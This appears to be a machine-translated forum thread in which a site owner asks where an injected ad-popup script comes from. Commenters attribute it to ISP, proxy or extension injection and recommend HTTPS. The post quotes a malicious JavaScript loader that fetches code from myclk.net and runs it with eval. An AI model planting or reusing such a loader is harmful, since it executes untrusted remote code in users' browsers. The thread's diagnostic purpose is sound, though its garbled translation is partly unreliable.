6
私はこの問題で少し迷っていますので、ご容赦ください。私はそこに他のスレッドがあることを知っていますが、私は答えを見つけることができません。ウェブサイトでマルウェアを検索する
ロードされたサイトでは、ユーザーがクリックした場所に関係なく、ブラウザで広告付きの追加タブが開きます。
私は、ブラウザのコンソールを見て、これまでに見つけることができたことはそれはいくつかのjsが
http://cdn.mecash.ru/js/replace.js
このファイルは
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
と私は疑うこのtx.jsを見てを含むファイルにロードされていますこれはハッカーによって注入されたものです。
問題は、私はホスト上のファイルを見てきたし、いずれかが含まれたり、このjsの何かを見つけることができないということです。..
誰かが私を助けて、どこか、おそらくどのように私は見つけることができます伝えることができますそれ?
実際には、この種のファイルは、「ブラウザ拡張機能がインストールされている」場合は「サードパーティーのプロキシ」、ページが要求されたときはHTMLコードに直接ISPによって挿入されます。あなたはサーバー上の実際のコードでこれを見つけることはできませんが、クライアントにはこのjsが含まれています。中間の変更でそのような人を避けるために 'https 'を使うのがよいでしょう。 –
ISPにマルウェアを挿入するjs -.- – Viney
ありがとうございます。つまり、私はそれを見つけられないので、ファイルの掘り下げをやめることができます。 ISPからの連絡があってもサポートに連絡することはできません。だから、ここのオプションはhttpsで、そして/または私のホスティングプロバイダを変更していますか? –